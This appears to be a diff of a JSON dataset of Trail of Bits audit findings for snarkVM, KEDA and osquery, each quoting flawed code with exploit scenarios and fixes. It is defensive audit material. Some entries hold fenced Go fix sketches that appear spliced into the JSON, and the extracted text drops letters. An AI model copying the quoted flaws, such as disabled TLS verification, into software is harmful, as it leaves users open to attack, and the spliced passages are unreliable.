Plaintext::from_bits_* functions assume array has elements ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The from_bits_le function assumes that the provided array is not empty, immediately indexing the first and second positions without a length check: /// Initializes a new plaintext from a list of little-endian bits *without* trailing zeros. fn from_bits_le (bits_le: & [ bool ]) -> Result < Self > { let mut counter = 0 ; let variant = [bits_le[counter], bits_le[counter + 1 ]]; counter += 2 ; Figure 11.1: circuit/program/src/data/plaintext/from_bits.rs#L22-L28 A similar pattern is present in the from_bits_be function in both the Circuit and Console implementations of Plaintext . Instead, the function should first check if the array is empty before accessing elements, or documentation should be added so that the function caller enforces this. Recommendations Short term, check if the array is empty before accessing elements, or add documentation so that the function caller enforces this.", + "title": "6. Redis scalers set InsecureSkipVerify when TLS is enabled ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The Redis Lists scaler (of which most of the code is reused by the Redis Streams scaler) supports the enableTLS option to allow the connection to the Redis server to use Transport Layer Security (TLS). However, when creating the TLSConfig for the Redis client, the scaler assigns the InsecureSkipVerify field to the value of enableTLS (Figure 6.1), which means that certificate and server name verification is always disabled when TLS is enabled. This allows trivial MitM attacks, rendering TLS ineffective. if info.enableTLS { options.TLSConfig = &tls.Config{ InsecureSkipVerify: info.enableTLS, } } Figure 6.1: KEDA sets InsecureSkipVerify to the value of info.enableTLS , which is always true in the block above. This pattern occurs in three locations: pkg/scalers/redis_scaler.go#L472-L476 , pkg/scalers/redis_scaler.go#L496-L500 , and pkg/scalers/redis_scaler.go#L517-L521 . KEDA does not document this insecure behavior, and users likely expect that enableTLS is implemented securely to prevent MitM attacks. The only public mention of this behavior is a stale, closed issue concerning this problem on GitHub . Exploit Scenario A user deploys KEDA with the Redis Lists or Redis Streams scaler. To protect the confidentiality and integrity of data in transit between KEDA and the Redis server, the user sets the enableTLS metadata field to true . Unbeknownst to the user, KEDA has disabled TLS certificate verification, allowing attackers on the network to modify the data in transit. An adversary can then falsify metrics coming from Redis to maliciously influence the scaling behavior of KEDA and the Kubernetes cluster (e.g., by causing a DoS). Recommendations Short term, add a warning to the public documentation that the enableTLS option, as currently implemented, is not secure. Short term, do not enable InsecureSkipVerify when the user specifies the enableTLS parameter.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: High", "Difficulty: High" ] }, { - "title": "12. 
Arbitrarily deep recursion causes stack exhaustion ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The codebase has recursive functions that operate on arbitrarily deep structures. This causes a runtime error as the program's stack is exhausted with a very large number of recursive calls. The Plaintext parser allows an arbitrarily deep interface value such as {bar: {bar: {bar: {... bar: true}}} . Since the formatting function is recursive, a sufficiently deep interface will exhaust the stack on the fmt_internal recursion. We confirmed this finding with a 2880-level nested interface. Parsing the interface with Plaintext::from_str succeeds, but printing the result causes stack exhaustion: #[test] fn test_parse_interface3 () -> Result <()> { let plain = Plaintext::::from_str( /* too long to display */ )?; println! ( \"Found: {plain}\\n\" ); Ok (()) } // running 1 test // thread 'data::plaintext::parse::tests::test_deep_interface' has overflowed its stack // fatal runtime error: stack overflow // error: test failed, to rerun pass '-p snarkvm-console-program --lib' Figure 12.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The same issue is present in the record and record entry formatting routines. The Record::find function is also recursive, and a sufficiently large argument array could also lead to stack exhaustion. However, we did not confirm this with a test. Exploit Scenario An attacker provides a program with a 2880-level deep interface, which causes a runtime error if the result is printed. Recommendations Short term, add a maximum depth to the supported data structures. Alternatively, implement an iterative algorithm for creating the displayed structure.", + "title": "7. Insufficient check against nil ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "Within a function in the scaler for Azure event hubs, the object partitionInfo is dereferenced before correctly checking it against nil . Before the object is used, a check confirms that partitionInfo is not nil . However, this check is insufficient because the function returns if the condition is met, and the function subsequently uses partitionInfo without additional checks against nil . As a result, a panic may occur when partitionInfo is later used in the same function. func (s *azureEventHubScaler) GetUnprocessedEventCountInPartition(ctx context.Context, partitionInfo *eventhub.HubPartitionRuntimeInformation) (newEventCount int64 , checkpoint azure.Checkpoint, err error ) { // if partitionInfo.LastEnqueuedOffset = -1, that means event hub partition is empty if partitionInfo != nil && partitionInfo.LastEnqueuedOffset == \"-1\" { return 0 , azure.Checkpoint{}, nil } checkpoint, err = azure.GetCheckpointFromBlobStorage(ctx, s.httpClient, s.metadata.eventHubInfo, partitionInfo.PartitionID ) Figure 7.1: partitionInfo is dereferenced before a nil check ( pkg/scalers/azure_eventhub_scaler.go#L253-L259 ) Exploit Scenario While the Azure event hub scaler performs its usual operations, an application error causes GetUnprocessedEventCountInPartition to be called with a nil partitionInfo parameter. This causes a panic, and the scaler crashes and stops monitoring events. Recommendations Short term, edit the code so that partitionInfo is checked against nil before dereferencing it.
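A minimal sketch of the corrected ordering, with a nil rejection up front so every later dereference is safe; hubPartitionInfo is a local stand-in for the eventhub.HubPartitionRuntimeInformation type, and the function is heavily abbreviated from the scaler.

```go
package main

import "fmt"

// hubPartitionInfo stands in for eventhub.HubPartitionRuntimeInformation.
type hubPartitionInfo struct {
	LastEnqueuedOffset string
	PartitionID        string
}

// getUnprocessedEventCount rejects a nil partitionInfo before any field of
// it is read, so the later dereferences cannot panic.
func getUnprocessedEventCount(partitionInfo *hubPartitionInfo) (int64, error) {
	if partitionInfo == nil {
		return 0, fmt.Errorf("partitionInfo is nil")
	}
	// An empty event hub partition reports LastEnqueuedOffset == "-1".
	if partitionInfo.LastEnqueuedOffset == "-1" {
		return 0, nil
	}
	// ... continue safely with partitionInfo.PartitionID ...
	return 0, nil
}
```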
Long term, use CodeQL and its go/missing-error-check query to detect future instances of this issue.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "13. Inconsistent pair parsing ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The codebase has several implementations to parse pairs from strings of the form key: value depending on the expected type of value . However, these parsers also handle whitespaces around the colon differently. As an example, figure 13.1 shows a parser that allows whitespaces before the colon, while figure 13.2 shows one that does not: fn parse_pair (string: &str ) -> ParserResult <(Identifier, Plaintext)> { // Parse the whitespace and comments from the string. let (string, _) = Sanitizer::parse(string)?; // Parse the identifier from the string. let (string, identifier) = Identifier::parse(string)?; // Parse the whitespace from the string. let (string, _) = Sanitizer::parse_whitespaces(string)?; // Parse the \":\" from the string. let (string, _) = tag( \":\" )(string)?; // Parse the plaintext from the string. let (string, plaintext) = Plaintext::parse(string)?; Figure 13.1: console/program/src/data/plaintext/parse.rs#L23-L34 fn parse_pair (string: &str ) -> ParserResult <(Identifier, Entry>)> { // Parse the whitespace and comments from the string. let (string, _) = Sanitizer::parse(string)?; // Parse the identifier from the string. let (string, identifier) = Identifier::parse(string)?; // Parse the \":\" from the string. let (string, _) = tag( \":\" )(string)?; // Parse the entry from the string. let (string, entry) = Entry::parse(string)?; Figure 13.2: console/program/src/data/record/parse_plaintext.rs#L23-L33 We also found that whitespaces before the comma symbol are not allowed: let (string, owner) = alt(( map(pair( Address::parse, tag( \".public\" ) ), |(owner, _)| Owner::Public(owner)), map(pair( Address::parse, tag( \".private\" ) ), |(owner, _)| { Owner::Private(Plaintext::from(Literal::Address(owner))) }), ))(string)?; // Parse the \",\" from the string. let (string, _) = tag( \",\" )(string)?; Figure 13.3: console/program/src/data/record/parse_plaintext.rs#L52-L60 Recommendations Short term, handle whitespace around marker tags (such as colons, commas, and brackets) uniformly. Consider implementing a generic pair parser that receives the expected value type parser instead of reimplementing it for each type. 14. Signature verifies with different messages Severity: Informational Difficulty: Low Type: Cryptography Finding ID: TOB-ALEOA-14 Target: console/account/src/signature/verify.rs", + "title": "8. Prometheus metrics server does not support authentication ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "When scraping metrics, Prometheus supports multiple forms of authentication , including Basic authentication, Bearer authentication, and OAuth 2.0. KEDA exposes Prometheus metrics but does not offer the ability to protect its metrics server with any of the supported authentication types. Exploit Scenario A user deploys KEDA on a network. An adversary gains access to the network and is able to issue HTTP requests to KEDA's Prometheus metrics server. As KEDA does not support authentication for the server, the attacker can trivially view the exposed metrics.
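Anticipating the recommendation that follows, here is a sketch of Basic authentication (one of the Prometheus-supported scrape-auth schemes) placed in front of the metrics handler. withBasicAuth is a hypothetical middleware, and the credentials would come from configuration rather than constants.

```go
package main

import (
	"crypto/subtle"
	"log"
	"net/http"

	"github.com/prometheus/client_golang/prometheus/promhttp"
)

// withBasicAuth rejects requests whose Basic credentials do not match,
// using constant-time comparison to avoid timing side channels.
func withBasicAuth(next http.Handler, user, pass string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		u, p, ok := r.BasicAuth()
		if !ok ||
			subtle.ConstantTimeCompare([]byte(u), []byte(user)) != 1 ||
			subtle.ConstantTimeCompare([]byte(p), []byte(pass)) != 1 {
			w.Header().Set("WWW-Authenticate", `Basic realm="metrics"`)
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	http.Handle("/metrics", withBasicAuth(promhttp.Handler(), "scraper", "secret"))
	log.Fatal(http.ListenAndServe(":9022", nil))
}
```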
Recommendations Short term, implement one or more of the authentication types that Prometheus supports for scrape targets. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "15. Unchecked output length during ToFields conversion ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "When converting different types to vectors of Field elements, the codebase has checks to validate that the resulting Field vector has fewer than MAX_DATA_SIZE_IN_FIELDS elements. However, the StringType::to_fields function is missing this validation: impl ToFields for StringType { type Field = Field; /// Casts a string into a list of base fields. fn to_fields (& self ) -> Vec < Self ::Field> { // Convert the string bytes into bits, then chunk them into lists of size // `E::BaseField::size_in_data_bits()` and recover the base field element for each chunk. // (For advanced users: Chunk into CAPACITY bits and create a linear combination per chunk.) self .to_bits_le().chunks(E::BaseField::size_in_data_bits()).map(Field::from_bits_le) .collect() } } Figure 15.1: circuit/types/string/src/helpers/to_fields.rs#L20-L30 We also remark that other conversion functions, such as from_bits and to_bits , do not constrain the input or output length. Recommendations Short term, add checks to validate the Field vector length for the StringType::to_fields function. Determine if other output functions (e.g., to_bits ) should also enforce length constraints.", + "title": "1. Project dependencies are not monitored for vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The osquery project depends on a large number of dependencies to realize the functionality of the existing tables. They are included as Git submodules in the project. The build mechanism of each dependency has been rewritten to suit the specific needs of osquery (e.g., so that it has as few dynamically loaded libraries as possible), but there is no process in place to detect published vulnerabilities in the dependencies. As a result, osquery could continue to use code with known vulnerabilities in the dependency projects. Exploit Scenario An attacker, who has gained a foothold on a machine running osquery, leverages an existing vulnerability in a dependency to exploit osquery. He escalates his privileges to those of the osquery agent or carries out a denial-of-service attack to block the osquery agent from sending data. Recommendations Short term, regularly update the dependencies to their latest versions. Long term, establish a process within the osquery project to detect published vulnerabilities in its dependencies.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "16. Potential panic on ensure_console_and_circuit_registers_match ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The codebase implements the ensure_console_and_circuit_registers_match function, which validates that the values on the console and circuit registers match.
The function uses zip_eq to iterate over the two register arrays, but does not check if these arrays have the same length, leading to a runtime error when they do not. pub fn ensure_console_and_circuit_registers_match (& self ) -> Result <()> { use circuit::Eject; for ((console_index, console_register), (circuit_index, circuit_register)) in self .console_registers.iter(). zip_eq (& self .circuit_registers) Figure 16.1: vm/compiler/src/process/registers/mod.rs This runtime error is currently not reachable since the ensure_console_and_circuit_registers_match function is called only in CallStack::Execute mode, and the number of stored registers matches in this case: // Store the inputs. function.inputs().iter().map(|i| i.register()).zip_eq(request.inputs()).try_for_each(|(register, input)| { // If the circuit is in execute mode, then store the console input. if let CallStack::Execute(..) = registers.call_stack() { // Assign the console input to the register. registers.store( self , register, input.eject_value())?; } // Assign the circuit input to the register. registers.store_circuit( self , register, input.clone()) })?; Figure 16.2: vm/compiler/src/process/stack/execute.rs Recommendations Short term, add a check to validate that the number of circuit and console registers match in the ensure_console_and_circuit_registers_match function.", + "title": "2. No separation of privileges when executing dependency code ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "In several places in the codebase, the osquery agent realizes the functionality of a table by invoking code in a dependency project. For example, the yara table is implemented by invoking code in libyara. However, there is no separation of privileges or sandboxing in place when the code in the dependency library is called, so the library code executes with the same privileges as the osquery agent. Considering the project's numerous dependencies, this issue increases the osquery agent's attack surface and would exacerbate the effects of any vulnerabilities in the dependencies. Exploit Scenario An attacker finds a vulnerability in a dependency library that allows her to gain code execution, and she elevates her privileges to that of the osquery agent. Recommendations Short term, regularly update the dependencies to their latest versions. Long term, create a security barrier against the dependency library code to minimize the impact of vulnerabilities.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: Medium" ] }, { "title": "3. No limit on the amount of information that can be read from the Firefox add-ons table ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", "body": "The implementation of the Firefox add-ons table has no limit on the amount of information that it can read from JSON files while enumerating the add-ons installed on a user profile. This is because to directly read and parse the Firefox profile JSON file, the parseJSON implementation in the osquery agent uses boost::property_tree, which does not have this limit. pt::ptree tree; if (!osquery::parseJSON(path + kFirefoxExtensionsFile, tree).ok()) { TLOG << \"Could not parse JSON from: \" << path + kFirefoxExtensionsFile; return; } Figure 3.1: The osquery::parseJSON function has no limit on the amount of data it can read.
Exploit Scenario An attacker crafts a large, valid JSON file and stores it on the Firefox profile path as extensions.json (e.g., in ~/Library/Application Support/Firefox/Profiles/foo/extensions.json on a macOS system). When osquery executes a query using the firefox_addons table, the parseJSON function reads and parses the complete file, causing high resource consumption. Recommendations Short term, enforce a maximum file size within the Firefox table, similar to the limits on other tables in osquery. Long term, consider removing osquery::parseJSON and implementing a single, standard way to parse JSON files across osquery. The osquery project currently uses both boost::property_tree and RapidJSON libraries to parse JSON files, resulting in the use of different code paths to handle untrusted content.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Low" ] }, { - "title": "17. Reserved keyword list is missing owner ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The compiler verifies that identifiers are not part of a list of reserved keywords. However, the list of keywords is missing the owner keyword. This contrasts with the other record field, gates , which is a reserved keyword. // Record \"record\" , \"gates\" , // Program Figure 17.1: vm/compiler/src/program/mod.rs Recommendations Short term, add owner to the list of reserved keywords.", + "title": "4. The SIP status on macOS may be misreported ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "If System Integrity Protection (SIP) is disabled on a Mac running osquery, the SIP configuration table might not report the correct value in the enabled column for the config_flag: sip row. For this misreporting to happen, extra flags need to be present in the value returned by csr_get_active_config and absent in the osquery kRootlessConfigFlags list. This is the case for the flags CSR_ALLOW_ANY_RECOVERY_OS, CSR_ALLOW_UNAPPROVED_KEXTS, CSR_ALLOW_EXECUTABLE_POLICY_OVERRIDE, and CSR_ALLOW_UNAUTHENTICATED_ROOT in xnu-7195.141.2/bsd/sys/csr.h (compare figure 4.1 and figure 4.3). /* CSR configuration flags */ #define CSR_ALLOW_UNTRUSTED_KEXTS (1 << 0) #define CSR_ALLOW_UNRESTRICTED_FS (1 << 1) #define CSR_ALLOW_TASK_FOR_PID (1 << 2) #define CSR_ALLOW_KERNEL_DEBUGGER (1 << 3) #define CSR_ALLOW_APPLE_INTERNAL (1 << 4) #define CSR_ALLOW_DESTRUCTIVE_DTRACE (1 << 5) /* name deprecated */ #define CSR_ALLOW_UNRESTRICTED_DTRACE (1 << 5) #define CSR_ALLOW_UNRESTRICTED_NVRAM (1 << 6) #define CSR_ALLOW_DEVICE_CONFIGURATION (1 << 7) #define CSR_ALLOW_ANY_RECOVERY_OS (1 << 8) #define CSR_ALLOW_UNAPPROVED_KEXTS (1 << 9) #define CSR_ALLOW_EXECUTABLE_POLICY_OVERRIDE (1 << 10) #define CSR_ALLOW_UNAUTHENTICATED_ROOT (1 << 11) Figure 4.1: The CSR flags in xnu-7195.141.2 QueryData results; csr_config_t config = 0; csr_get_active_config(&config); csr_config_t valid_allowed_flags = 0; for (const auto& kv : kRootlessConfigFlags) { valid_allowed_flags |= kv.second; } Row r; r[\"config_flag\"] = \"sip\"; if (config == 0) { // SIP is enabled (default) r[\"enabled\"] = INTEGER(1); r[\"enabled_nvram\"] = INTEGER(1); } else if ((config | valid_allowed_flags) == valid_allowed_flags) { // mark SIP as NOT enabled (i.e.
disabled) if // any of the valid_allowed_flags is set r[\"enabled\"] = INTEGER(0); r[\"enabled_nvram\"] = INTEGER(0); } results.push_back(r); Figure 4.2: How the SIP state is computed in genSIPConfig // rootless configuration flags // https://opensource.apple.com/source/xnu/xnu-3248.20.55/bsd/sys/csr.h const std::map kRootlessConfigFlags = { // CSR_ALLOW_UNTRUSTED_KEXTS {\"allow_untrusted_kexts\", (1 << 0)}, // CSR_ALLOW_UNRESTRICTED_FS {\"allow_unrestricted_fs\", (1 << 1)}, // CSR_ALLOW_TASK_FOR_PID {\"allow_task_for_pid\", (1 << 2)}, // CSR_ALLOW_KERNEL_DEBUGGER {\"allow_kernel_debugger\", (1 << 3)}, // CSR_ALLOW_APPLE_INTERNAL {\"allow_apple_internal\", (1 << 4)}, // CSR_ALLOW_UNRESTRICTED_DTRACE {\"allow_unrestricted_dtrace\", (1 << 5)}, // CSR_ALLOW_UNRESTRICTED_NVRAM {\"allow_unrestricted_nvram\", (1 << 6)}, // CSR_ALLOW_DEVICE_CONFIGURATION {\"allow_device_configuration\", (1 << 7)}, }; Figure 4.3: The flags currently supported by osquery Exploit Scenario An attacker, who has gained a foothold with root privileges, disables SIP on a device running macOS and sets the csr_config flags to 0x3e7. When building the response for the sip_config table, osquery misreports the state of SIP. Recommendations Short term, consider reporting SIP as disabled if any flag is present or if any of the known flags are present (e.g., if (config & valid_allowed_flags) != 0). Long term, add support for reporting the raw flag values to the table specification and code so that the upstream server can make the final determination on the state of SIP, irrespective of the flags supported by the osquery daemon. Additionally, monitor for changes and add support for new flags as they are added in the macOS kernel.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { - "title": "18. Commit and hash instructions not matched against the opcode in check_instruction_opcode ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The check_instruction_opcode function validates that the opcode and instructions match for the Literal , Call , and Cast opcodes, but not for the Commit and Hash opcodes. Although there is partial code for this validation, it is commented out: Opcode::Commit(opcode) => { // Ensure the instruction belongs to the defined set. if ![ \"commit.bhp256\" , \"commit.bhp512\" , \"commit.bhp768\" , \"commit.bhp1024\" , \"commit.ped64\" , \"commit.ped128\" , ] .contains(&opcode) { bail!( \"Instruction '{instruction}' is not the opcode '{opcode}'.\" ); } // Ensure the instruction is the correct one. // match opcode { // \"commit.bhp256\" => ensure!( // matches!(instruction, Instruction::CommitBHP256(..)), // \"Instruction '{instruction}' is not the opcode '{opcode}'.\" // ), // } } Opcode::Hash(opcode) => { // Ensure the instruction belongs to the defined set. if ![ \"hash.bhp256\" , \"hash.bhp512\" , \"hash.bhp768\" , \"hash.bhp1024\" , \"hash.ped64\" , \"hash.ped128\" , \"hash.psd2\" , \"hash.psd4\" , \"hash.psd8\" , ] .contains(&opcode) { bail!( \"Instruction '{instruction}' is not the opcode '{opcode}'.\" ); } // Ensure the instruction is the correct one.
// match opcode { // \"hash.bhp256\" => ensure!( // matches!(instruction, Instruction::HashBHP256(..)), // \"Instruction '{instruction}' is not the opcode '{opcode}'.\" // ), // } } Figure 18.1: vm/compiler/src/process/stack/helpers/insert.rs Recommendations Short term, add checks to validate that the opcode and instructions match for the Commit and Hash opcodes.", + "title": "5. The OpenReadableFile function can hang on reading a le ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The OpenReadableFile function creates an instance of the PlatformFile class, which is used for reading and writing les. The constructor of PlatformFile uses the open syscall to obtain a handle to the le. The OpenReadableFile function by default opens the le using the O_NONBLOCK ag, but if PlatformFiles isSpecialFile method returns true, it opens the le without using O_NONBLOCK. On the POSIX platform, the isSpecialFile method returns true for les in which fstat returns a size of zero. If the le to be read is a FIFO, the open syscall in the second invocation of PlatformFiles constructor blocks the osquery thread until another thread opens the FIFO le to write to it. struct OpenReadableFile : private boost::noncopyable { public: explicit OpenReadableFile(const fs::path& path, bool blocking = false) : blocking_io(blocking) { int mode = PF_OPEN_EXISTING | PF_READ; if (!blocking) { mode |= PF_NONBLOCK; } // Open the file descriptor and allow caller to perform error checking. fd = std::make_unique(path, mode); if (!blocking && fd->isSpecialFile()) { // A special file cannot be read in non-blocking mode, reopen in blocking // mode mode &= ~PF_NONBLOCK; blocking_io = true; fd = std::make_unique(path, mode); } } public: std::unique_ptr fd{nullptr}; 21 Atlassian: osquery Security Assessment bool blocking_io; }; Figure 5.1: The OpenReadableFile function can block the osquery thread. Exploit Scenario An attacker creates a special le, such as a FIFO, in a path known to be read by the osquery agent. When the osquery agent attempts to open and read the le, it blocks the osquery thread indenitely, in eect making osquery unable to report the status to the server. Recommendations Short term, ensure that the le operations in filesystem.cpp do not block the osquery thread. Long term, introduce a timeout on le operations so that a block does not stall the osquery thread. References The Single Unix Specication, Version 2 22 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "19. Incorrect validation of the number of operands ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The implementation of Literals::fmt and Literals::write_le do not correctly validate the number of operands in the operation. Instead of enforcing the exact number of arguments, the implementations only ensure that the number of operands is less than or equal to the expected number of operands: /// Writes the operation to a buffer. fn write_le (& self , mut writer: W ) -> IoResult <()> { // Ensure the number of operands is within the bounds. if NUM_OPERANDS > N::MAX_OPERANDS { return Err (error( format! ( \"The number of operands must be <= {}\" , N::MAX_OPERANDS))); } // Ensure the number of operands is correct. if self .operands.len() > NUM_OPERANDS { return Err (error( format! 
( \"The number of operands must be {}\" , NUM_OPERANDS))); } Figure 19.1: vm/compiler/src/program/instruction/operation/literals.rs#L294-L303 Recommendations Short term, replace the if statement guard with self.operands.len() != NUM_OPERANDS in both the Literals::fmt and Literals::write_le functions.", + "title": "6. Methods in POSIX PlatformFile class are susceptible to race conditions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The POSIX implementation of the methods in the PlatformFile class includes several methods that return the current properties of a le. However, the properties can change during the lifetime of the le descriptor, so the return values of these methods may not reect the actual properties. For example, the isSpecialFile method, which is used to determine the strategy for reading the le, calls the size method. However, the le size can change between the time of the call and the reading operation, in which case the wrong strategy for reading the le could be used. bool PlatformFile::isSpecialFile() const { return (size() == 0); } static uid_t getFileOwner(PlatformHandle handle) { struct stat file; if (::fstat(handle, &file) < 0) { return -1; } return file.st_uid; } Status PlatformFile::isOwnerRoot() const { if (!isValid()) { return Status(-1, \"Invalid handle_\"); } uid_t owner_id = getFileOwner(handle_); if (owner_id == (uid_t)-1) { return Status(-1, \"fstat error\"); } if (owner_id == 0) { return Status::success(); } return Status(1, \"Owner is not root\"); } Status PlatformFile::isOwnerCurrentUser() const { 23 Atlassian: osquery Security Assessment if (!isValid()) { return Status(-1, \"Invalid handle_\"); } uid_t owner_id = getFileOwner(handle_); if (owner_id == (uid_t)-1) { return Status(-1, \"fstat error\"); } if (owner_id == ::getuid()) { return Status::success(); } return Status(1, \"Owner is not current user\"); } Status PlatformFile::isExecutable() const { struct stat file_stat; if (::fstat(handle_, &file_stat) < 0) { return Status(-1, \"fstat error\"); } if ((file_stat.st_mode & S_IXUSR) == S_IXUSR) { return Status::success(); } return Status(1, \"Not executable\"); } Status PlatformFile::hasSafePermissions() const { struct stat file; if (::fstat(handle_, &file) < 0) { return Status(-1, \"fstat error\"); } // We allow user write for now, since our main threat is external // modification by other users if ((file.st_mode & S_IWOTH) == 0) { return Status::success(); } return Status(1, \"Writable\"); } Figure 6.1: The methods in PlatformFile could cause race issues. Exploit Scenario A new function is added to osquery that uses hasSafePermissions to determine whether to allow a potentially unsafe operation. An attacker creates a le that passes the hasSafePermissions check, then changes the permissions and alters the le contents before the le is further processed by the osquery agent. 24 Atlassian: osquery Security Assessment Recommendations Short term, refactor the operations of the relevant PlatformFile class methods to minimize the race window. For example, the only place hasSafePermissions is currently used is in the safePermissions function, in which it is preceded by a check that the le is owned by root or the current user, which eliminates the possibility of an adversary using the race condition; therefore, refactoring may not be necessary in this method. Add comments to these methods describing possible adverse eects. 
Long term, refactor the interface of PlatformFile to contain the potential race issues within the class. For example, move the safePermissions function into the PlatformFile class so that hasSafePermissions is not exposed outside of the class.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "20. Inconsistent and random compiler error message ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "When the compiler finds a type mismatch between arguments and expected parameters, it emits an error message containing a different integer each time the code is compiled. Figure 20.1 shows an Aleo program that, when compiled twice, shows two different error messages (shown in figure 20.2). The error message also states that u8 is invalid while at the same time expecting u8 . program main.aleo; closure clo: input r0 as i8; input r1 as u8; pow r0 r1 into r2; output r2 as i8; function compute: input r0 as i8.private; input r1 as i8.public; call clo r0 r1 into r2; // r1 is i8 but the closure requires u8 output r2 as i8.private; Figure 20.1: Aleo program ~/Documents/aleo/foo (testnet3?) $ aleo build Compiling 'main.aleo'... Loaded universal setup (in 1537 ms) 'u8' is invalid : expected u8, found 124i8 ~/Documents/aleo/foo (testnet3?) $ aleo build Compiling 'main.aleo'... Loaded universal setup (in 1487 ms) 'u8' is invalid : expected u8, found -39i8 Figure 20.2: Two compilation results Figure 20.3 shows the check that validates that the types match and shows the error message containing the actual literal instead of literal.to_type() : Plaintext::Literal(literal, ..) => { // Ensure the literal type matches. match literal.to_type() == *literal_type { true => Ok (()), false => bail!( \"'{ plaintext_type }' is invalid: expected {literal_type}, found { literal }\" ), Figure 20.3: vm/compiler/src/process/stack/helpers/matches.rs#L204-L209 Recommendations Short term, clarify the error message by rephrasing it and presenting only the literal type instead of the full literal.", + "title": "7. No limit on the amount of data that parsePlist can parse ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "To support several macOS-specific tables, osquery contains a function called osquery::parsePlist, which reads and parses property list (.plist) files by using the Apple Foundation framework class NSPropertyListSerialization. The parsePlist function is used by tables such as browser_plugins and xprotect_reports to read user-accessible files. The function does not have any limit on the amount of data that it will parse. id ns_path = [NSString stringWithUTF8String:path.string().c_str()]; id stream = [NSInputStream inputStreamWithFileAtPath:ns_path]; if (stream == nil) { return Status(1, \"Unable to read plist: \" + path.string()); } // Read file content into a data object, containing potential plist data. NSError* error = nil; [stream open]; id plist_data = [NSPropertyListSerialization propertyListWithStream:stream options:0 format:NULL error:&error]; Figure 7.1: The parsePlist implementation does not have a limit on the amount of data that it can deserialize. auto info_path = path + \"/Contents/Info.plist\"; // Ensure that what we're processing is actually a plug-in.
if (!pathExists(info_path)) { return; } if (osquery::parsePlist(info_path, tree).ok()) { // Plugin did not include an Info.plist, or it was invalid for (const auto& it : kBrowserPluginKeys) { r[it.second] = tree.get(it.first, \"\"); // Convert bool-types to an integer. jsonBoolAsInt(r[it.second]); } } Figure 7.2: browser_plugins uses parsePlist on user-controlled files. Exploit Scenario An attacker crafts a large, valid .plist file and stores it in ~/Library/Internet Plug-Ins/foo/Contents/Info.plist on a macOS system running the osquery daemon. When osquery executes a query using the browser_plugins table, it reads and parses the complete file, causing high resource consumption. Recommendations Short term, modify the browser_plugins and xprotect_reports tables to enforce a maximum file size (e.g., by combining readFile and parsePlistContent). Long term, to prevent this issue in future tables, consider removing the parsePlist function or rewriting it as a helper function around a safer implementation.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "21. Instruction add_* methods incorrectly compare maximum number of allowed instructions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "During function and closure parsing, the compiler collects input, regular, and output instructions into three different IndexSet s in the add_input , add_instruction , and add_output functions. All of these functions check that the current number of elements in their respective IndexSet does not exceed the maximum allowed number. However, the check is done before inserting the element in the set, allowing inserting in a set that is already at full capacity and creating a set with one element more than the maximum. Figure 21.1 shows the comparison between the current and the maximum number of allowed elements and the subsequent insertion, which is allowed even though the set could already be at full capacity. All add_input , add_instruction , and add_output functions for both the Function and Closure types present similar behavior. Note that although the number of input and output instructions is checked in other locations (e.g., in the add_closure or get_closure functions), the number of regular instructions is not checked there, allowing a function or a closure with 1 + N::MAX_INSTRUCTIONS . fn add_output (& mut self , output: Output ) -> Result <()> { // Ensure there are input statements and instructions in memory. ensure!(! self .inputs.is_empty(), \"Cannot add outputs before inputs have been added\" 